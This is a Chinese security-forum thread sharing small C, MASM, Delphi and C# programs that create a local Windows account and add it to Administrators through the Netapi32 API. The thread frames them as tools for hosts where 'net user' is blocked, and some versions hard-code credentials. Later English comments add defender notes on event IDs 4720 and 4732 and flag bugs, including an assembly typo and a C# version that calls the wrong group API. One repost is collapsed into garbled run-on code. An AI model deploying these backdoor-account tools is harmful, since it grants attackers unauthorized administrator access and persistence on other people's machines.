[原创]使用API添加用户的小程序 当net user不能使用时 TRY
文章作者:pt007[at]vip.sina.com信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
[b]注:文章首发[url=http://blog.csdn.net/I_S_T_O]I.S.T.O信息安全团队[/url],后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。[/b]
[language=c]#ifndef UNICODE
#define UNICODE
#endif
#include <stdio.h>
#include <windows.h>
#include <lm.h>
#pragma comment(lib,"netapi32")
int Usage(wchar_t *);
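int wmain(int argc, wchar_t *argv[])
{
    /*
     * Entry point: creates the local account argv[1] with password argv[2]
     * through NetUserAdd (level 1), then adds it to the local
     * "Administrators" group through NetLocalGroupAddMembers (level 3).
     * Both calls target the local machine (server name NULL).
     *
     * Returns 0 on success (or after printing usage), 1 if either call fails.
     *
     * Defender note: on an audited host these two calls correspond to
     * Security-log events 4720 (user account created) and 4732 (member added
     * to a security-enabled local group); alerting on 4732 for the
     * Administrators group catches this regardless of which tool is used.
     */
    USER_INFO_1 ui = {0};          /* zero-init: the original left usri1_password_age indeterminate */
    DWORD dwParmErr = 0;           /* receives the index of the bad field on ERROR_INVALID_PARAMETER */
    NET_API_STATUS status;
    LOCALGROUP_MEMBERS_INFO_3 account;

    if (argc != 3)
    {
        Usage(argv[0]);
        return 0;
    }

    ui.usri1_name = argv[1];
    ui.usri1_password = argv[2];
    ui.usri1_priv = USER_PRIV_USER;  /* the only privilege level NetUserAdd accepts */
    ui.usri1_home_dir = NULL;
    ui.usri1_comment = NULL;
    ui.usri1_flags = UF_SCRIPT;      /* required flag for a level-1 USER_INFO_1 */
    ui.usri1_script_path = NULL;

    status = NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwParmErr);
    if (status != NERR_Success)
    {
        /* Surface the NET_API_STATUS code (and the parm_err index, meaningful
         * only for ERROR_INVALID_PARAMETER) instead of a bare "Error!". */
        fwprintf(stderr, L"Add user %s Error! (status %lu, parm_err %lu)\n",
                 argv[1], (unsigned long)status, (unsigned long)dwParmErr);
        return 1;
    }
    /* The original echoed the password here; a credential in console output
     * ends up in terminal logs and screenshots, so only the name is printed. */
    fwprintf(stderr, L"User [%s] has been successfully added\n", argv[1]);

    /* argv[1] is already a NUL-terminated wide string; the original copied it
     * with an unbounded wcscpy into a 100-element stack buffer for no benefit. */
    account.lgrmi3_domainandname = argv[1];

    status = NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
    if (status != NERR_Success)
    {
        printf("Add to Administrators Fail! (status %lu)\n", (unsigned long)status);
        return 1;
    }
    printf("Add to Administrators success.\n");
    return 0;
}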
//输出帮助的典型方法:
/*
 * Prints the banner and an example invocation to stdout, then returns 1
 * (the caller ignores the value and exits 0 itself).
 * The parameter is named "username" but the only caller, wmain, passes
 * argv[0] -- the program path -- which is what the example line shows.
 * Note: narrow fprintf and wide fwprintf are mixed on the same stdout stream;
 * the C standard does not allow byte and wide I/O on one oriented stream, so
 * this appears to rely on the MSVC runtime being lenient about it.
 */
int Usage (wchar_t *username)
{
fprintf(stdout,"===============================================================================\n"
"\t名称:使用API添加用户的小程序\n"
"\t作者:[email]pt007@vip.sina.com[/email]\n"
"\t团队: I.S.T.O信息安全团队([url]http://blog.csdn.net/I_S_T_O[/url])\n"
"\tQQ: 7491805\n"
"\t声明:本软件由pt007原创,转载请注明出处,谢谢!\n");
/* On the MSVC runtime %s in a wide format string consumes a wide string, so argv[0] fits here. */
fwprintf(stdout,L"\texample: %s test11 test123\n",username);
fprintf(stdout,"===============================================================================\n");
return 1;
}[/language] 汗~~ 这么多时间!咋就不帮偶写个JNI的DLL 还有SO 插入平台特有的功能到JSP里面! [quote]引用第1楼kj021320于2007-11-21 16:43发表的 :
汗~~ 这么多时间!咋就不帮偶写个JNI的DLL 还有SO 插入平台特有的功能到JSP里面![/quote]
我试试吧,就是不知道怎么入手。 [s:270] 我是这样想的,如果主机很BT,net都不能用,你说用WMI或者ADSI的脚本,与选择用这个程序,综合衡量一下。 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;code by asm [url]http://www.asm32.cn/[/url]
;2007-9-29
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Creates the local user szUser ("asm") with password szPass via NetUserAdd
; level 1, then adds it to the local Administrators group via
; NetLocalGroupAddMembers level 3. Both calls use a NULL server name (local
; machine). The return codes of both calls are discarded and the process
; always exits with code 0.
; Defender note: on an audited host this leaves the same trail as the C
; version above -- Security events 4720 (user account created) and 4732
; (member added to a security-enabled local group).
.386
.model flat, stdcall
option casemap :none ; case sensitive
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Includes
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
include kernel32.inc
include netapi32.inc
includelib user32.lib
includelib kernel32.lib
includelib netapi32.lib
.data?
oUserInfo USER_INFO_1<?>                     ; uninitialised here, zeroed at runtime below
oUser LOCALGROUP_MEMBERS_INFO_3 <?>
dwErr DWORD ?                                ; parm_err output of NetUserAdd, never read back
.data
; UTF-16 strings assembled one code unit (dw) at a time, NUL-terminated.
szUser dw "a","s","m",0
szPass dw "p","a","s","s",0
szAdministrators dw "A","d","m","i","n","i","s","t","r","a","t","o","r","s",0
.code
start:
; RtlZeroMemory(&oUserInfo, sizeof USER_INFO_1): stdcall, arguments pushed right to left.
; A structure type name used as an operand evaluates to its size in MASM.
push USER_INFO_1
push offset oUserInfo
call RtlZeroMemory
; Store the string pointers into the structure via push/pop, without touching a register.
push offset szUser
pop oUserInfo.usri1_name
push offset szPass
pop oUserInfo.usri1_password
mov oUserInfo.usri1_priv,USER_PRIV_USER
; NOTE(review): only UF_NORMAL_ACCOUNT is set; the C version above sets UF_SCRIPT,
; which the USER_INFO_1 documentation lists as required -- confirm NetUserAdd
; accepts this combination.
mov oUserInfo.usri1_flags,UF_NORMAL_ACCOUNT
; NetUserAdd(NULL, 1, &oUserInfo, &dwErr)
push offset dwErr
push offset oUserInfo
push 1
push NULL
call NetUserAdd
; eax (NET_API_STATUS) is not tested: on failure execution falls straight through.
; Reuse the name pointer as the LOCALGROUP_MEMBERS_INFO_3 member string.
push oUserInfo.usri1_name
pop oUser.lgrmi3_domainandname
; NetLocalGroupAddMembers(NULL, szAdministrators, 3, &oUser, 1)
push 1
push offset oUser
push 3
push offset szAdministrators
push NULL
call NetLocalGroupAddMembers
; ExitProcess(0): the status of the previous call is again discarded.
mov eax,0
push eax
call ExitProcess
end start
[s:265]
user:asm
pass:pass mov eax,0
push eax
call ExitProcess
[s:289] 太深奥了...看不懂... LS的:传参数哈,第一个参数:NULL asm有个特点 [s:264] 最喜欢用asm砸人 哈哈 添加一个 用户名:EvilOctal 密码:password
程序大小:1KB
[language=asm]
; Same flow as the push/call version above, written with invoke: create the
; local user "EvilOctal" / "password" via NetUserAdd level 1, then add it to
; the local Administrators group via NetLocalGroupAddMembers level 3.
; $CTW0 comes from Strings.mac and appears to yield the address of an inline
; NUL-terminated UTF-16 string. Return codes are discarded; exit code is always 0.
.486
.model flat,stdcall
option casemap:none
include windows.inc
include Strings.mac
include netapi32.inc
include kernel32.inc
includelib netapi32.lib
includelib kernel32.lib
.data?
oUserInfo USER_INFO_1 <?>                    ; zeroed at runtime by RtlZeroMemory
oUser LOCALGROUP_MEMBERS_INFO_3 <?>
dwErr DWORD ?                                ; parm_err output of NetUserAdd, never read back
.code
start:
; NOTE(review): "USE_INFO_1" is a typo for USER_INFO_1 (undefined symbol), so this
; line should not assemble as written; the forum repost below carries the same typo.
invoke RtlZeroMemory,addr oUserInfo,sizeof USE_INFO_1
mov eax,$CTW0("EvilOctal")
mov oUserInfo.usri1_name,eax
mov eax,$CTW0("password")
mov oUserInfo.usri1_password,eax
mov oUserInfo.usri1_priv,USER_PRIV_USER
; NOTE(review): UF_SCRIPT is not set here either (the C version above sets it).
mov oUserInfo.usri1_flags,UF_NORMAL_ACCOUNT
; NET_API_STATUS in eax is not checked after either call below.
invoke NetUserAdd,NULL,1,addr oUserInfo,addr dwErr
; Reuse the name pointer as the level-3 member string.
push oUserInfo.usri1_name
pop oUser.lgrmi3_domainandname
invoke NetLocalGroupAddMembers,NULL,$CTW0("Administrators"),3,addr oUser,1
invoke ExitProcess,0
end start
[/language]
貌似楼主的代码大部分拷贝MSDN上的 NetUserAdd API的示例代码 [code] .486.model flat,stdcalloption casemap:none include windows.incinclude Strings.macinclude netapi32.incinclude kernel32.incincludelib netapi32.libincludelib kernel32.lib .data?oUserInfo USER_INFO_1 <?>oUser LOCALGROUP_MEMBERS_INFO_3 <?>dwErr DWORD ? .codestart:invoke RtlZeroMemory,addr oUserInfo,sizeof USE_INFO_1mov eax,$CTW0("EvilOctal") mov oUserInfo.usri1_name,eaxmov eax,$CTW0("password") mov oUserInfo.usri1_password,eaxmov oUserInfo.usri1_priv,USER_PRIV_USERmov oUserInfo.usri1_flags,UF_NORMAL_ACCOUNTinvoke NetUserAdd,NULL,1,addr oUserInfo,addr dwErrpush oUserInfo.usri1_namepop oUser.lgrmi3_domainandnameinvoke NetLocalGroupAddMembers,NULL,$CTW0("Administrators"),3,addr oUser,1invoke ExitProcess,0end start[/code]MS 和 ASM 相似啊 [quote]引用第6楼xi4oyu于2007-11-21 23:36发表的 :
LS的:传参数哈,第一个参数:NULL[/quote]
可是为什么 不是
push 0
call exitprocess
呢? 百思不得其解啊.... [quote]引用第10楼洋洋洒洒于2007-11-22 13:49发表的 :
可是为什么 不是
push 0
call exitprocess
.......[/quote]
所以我把他的代码简化了下。。。 [quote]引用第10楼洋洋洒洒于2007-11-22 13:49发表的 :
可是为什么 不是
push 0
call exitprocess
.......[/quote]
手误,手误 [s:265] delphi 版的
----------------------------------------------------------
program adduser;
{$APPTYPE CONSOLE}
uses
windows;
// Mirror of the Win32 USER_INFO_1 structure (lm.h): pointer and DWORD fields in
// the same order as the native definition, so the record can be handed to
// NetUserAdd level 1 as an opaque buffer.
type USER_INFO_1=record
usri1_name:pwidechar;
usri1_password:pwidechar;
usri1_password_age:dword;
usri1_priv:dword;
usri1_home_dir:pwidechar;
usri1_comment:pwidechar;
usri1_flags:dword;
usri1_script_path:pwidechar;
end;
// Pointer to the record above; the main block allocates one with GetMem.
buffer=^USER_INFO_1;
// Mirror of LOCALGROUP_MEMBERS_INFO_3: a single "name" or "DOMAIN\name" string.
type
_LOCALGROUP_MEMBERS_INFO_3 = record
lgrmi3_domainandname: PWideChar;
end;
// Netapi32 import. NOTE(review): the native parm_err argument is a pointer
// (LPDWORD) but is declared here as a by-value dword; the main block passes the
// global 'error' by value, so the API presumably receives 0 (NULL), which it
// accepts as "parm_err not wanted" -- confirm.
function NetUserAdd(Server:PWideChar;Level:DWORD;Buf:pointer;ParmError:dword):LongInt;
stdcall; external 'netapi32.dll';
// Netapi32 import. The untyped 'var MemsBuf' passes the member record by
// reference, matching the native LPBYTE buffer parameter.
function NetLocalGroupAddMembers(Server, GroupName: PWideChar; Level:Cardinal;
var MemsBuf; TotalEntries: Cardinal): Integer; stdcall; external 'netapi32.dll';
var
buf:buffer;                         // heap USER_INFO_1, freed right after NetUserAdd
error:Cardinal;                     // passed by value as parm_err, never read back
user,pass:WideString;               // command-line name/password; the API gets PWideChar pointers into them
members: _LOCALGROUP_MEMBERS_INFO_3;
// Program entry: with a user name in ParamStr(1) (and password in ParamStr(2)),
// create the local account and then add it to the local Administrators group;
// without arguments, print the author line and an example invocation.
// Only ParamStr(1) is checked, so a missing second argument yields an empty
// password string.
begin
if paramstr(1)<>'' then
begin
user:=paramstr(1);
pass:=paramstr(2);
// Allocate the USER_INFO_1 buffer and fill it field by field.
getmem(buf,sizeof(USER_INFO_1));
with buf^ do
begin
usri1_name:=PWideChar(user);
usri1_password:=PWideChar(pass);
usri1_password_age:=0;
usri1_priv:=1;        // USER_PRIV_USER
usri1_home_dir:=nil;
usri1_comment:=nil;
usri1_flags:=1;       // UF_SCRIPT
usri1_script_path:=nil;
end;
// NERR_Success is 0. The failure branch only prints; the group step below
// still runs even when the account was not created.
if NetUserAdd(nil,1,pointer(buf), error)=0 then
writeln(paramstr(1)+' 添加成功!') else
writeln(paramstr(1)+' 添加失败!');
freemem(buf);
// Level-3 member record: holds the account name string for the local group call.
Members.lgrmi3_domainandname := PWideChar(user);
if NetLocalGroupAddMembers(nil, 'Administrators', 3, Members, 1)=0 then
writeln(paramstr(1)+' 添加到管理员组成功!') else
writeln(paramstr(1)+' 添加到管理员组添加失败!');
end else
begin
writeln('舍我其谁 QQ:303428402');
writeln('example:'+#13#10+'adduser.exe '+'username'+' '+'password');
// NOTE(review): the dashed line below is forum formatting, not Pascal source.
----------------------------------------------------------
end;
end. 再给个我写的C#版本的
Windows Vista Home Premium
VS 2005
Net 2.0 下编译通过
用户名:Delphiscn 密码:EvilOctal
[code]
using System.Runtime.InteropServices;
using Microsoft.Win32;
using System;
namespace Task
{
/// <summary>
/// Creates the local account "Delphiscn" / "EvilOctal" through Netapi32.NetUserAdd
/// and then runs a local-group step (see the note on Add_a_UserAccount_to_LocalGroup).
/// Credentials and the server name (null = local machine) are hard-coded.
/// </summary>
class AddUserApplication
{
// NOTE(review): no CharSet on the DllImport, so LPTStr marshals as ANSI by
// default; harmless here because servername is always null. The native
// parm_err is an LPDWORD but is declared as a by-value int; passing 0 sends a
// NULL pointer, which the API accepts as "not wanted".
[DllImport("Netapi32.dll")]
extern static int NetUserAdd([MarshalAs(UnmanagedType.LPTStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);
// NOTE(review): NetLocalGroupAdd creates a *new* local group from a
// LOCALGROUP_INFO_1; it does not add an account to an existing group. The other
// versions on this page use NetLocalGroupAddMembers for membership.
[DllImport("Netapi32.dll")]
extern static int NetLocalGroupAdd([MarshalAs(UnmanagedType.LPTStr)] string servername, int level, ref LOCALGROUP_INFO_1 buf, int parm_err);
/// <summary>
/// Managed mirror of the native USER_INFO_1 (lm.h); field order must match the
/// native layout exactly.
/// NOTE(review): user_information_1_password_age is declared as string, but the
/// native field is a DWORD. A string marshals as a pointer, so the layout only
/// lines up where pointers are 4 bytes (x86); on x64 the following fields shift.
/// user_information_1_flags is never assigned and stays 0; the C version above
/// sets UF_SCRIPT, which the USER_INFO_1 documentation lists as required --
/// confirm NetUserAdd accepts 0.
/// </summary>
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct USER_INFO_1
{
public string user_information_1_name;
public string user_information_1_password;
public string user_information_1_password_age;   // native type is DWORD, see note above
public int user_information_1_priv;
public string user_information_1_home_dir;
public string comment;
public int user_information_1_flags;
public string user_information_1_script_path;
}
/// <summary>
/// Managed mirror of LOCALGROUP_INFO_1 (group name + comment). No StructLayout
/// attribute is given; sequential layout is the default for structs.
/// </summary>
public struct LOCALGROUP_INFO_1
{
[MarshalAs(UnmanagedType.LPWStr)]public string Add_localgroup_1_name;
[MarshalAs(UnmanagedType.LPWStr)]public string Add_localgroup_1_comment;
}
/// <summary>Entry point: create the account, then run the group step only if that succeeded.</summary>
public static void Main()
{
if ((Add_a_User_Account())==false )
{
Console.Write("Error: Adding User Failed Sorry");
}
else
Add_a_UserAccount_to_LocalGroup();
}
//public static void Usage()
//{
//Console.Write("------------------------------------");
//Console.Write("Code BY Delphiscn 2008-01-28");
//Console.Write("Email:Delphiscn@gmail.com");
//Console.Write("Blog: [url]http://blog.csdn.net/delphiscn[/url]");
//Console.Write("------------------------------------");
//}
/// <summary>
/// Fills a USER_INFO_1 with the hard-coded name, password, USER_PRIV_USER (1)
/// and a comment, then calls NetUserAdd level 1 against the local machine.
/// Returns false (after printing a message) when the status is not
/// NERR_Success (0), true otherwise.
/// </summary>
public static Boolean Add_a_User_Account()
{
USER_INFO_1 AddUser = new USER_INFO_1();
AddUser.user_information_1_name = "Delphiscn";
AddUser.user_information_1_password = "EvilOctal";
AddUser.user_information_1_priv = 1;
AddUser.user_information_1_home_dir = null;
AddUser.comment = "Add a User Named Delphiscn";
AddUser.user_information_1_script_path = null;
if (NetUserAdd(null, 1, ref AddUser, 0) != 0)
{
Console.Write("Error: Adding User Failed");
return false;
}
return true;
}
/// <summary>
/// Despite its name, this calls NetLocalGroupAdd with a LOCALGROUP_INFO_1, i.e.
/// it asks to create a local group named "Administrators" rather than adding
/// the new account to it. Where that group already exists the call fails and
/// the message below is printed; the new account's group membership is not
/// changed by this method.
/// </summary>
public static void Add_a_UserAccount_to_LocalGroup()
{
LOCALGROUP_INFO_1 AddToGroup= new LOCALGROUP_INFO_1();
AddToGroup.Add_localgroup_1_name = "Administrators";
AddToGroup.Add_localgroup_1_comment = "Add a User to the Administrators Group";
if (NetLocalGroupAdd(null, 1, ref AddToGroup , 0) != 0)
{
Console.Write("Adding To the Administrators Group Failed");
}
}
}
}
[/code] 看C#就晕...
还是用我的VC++ -_-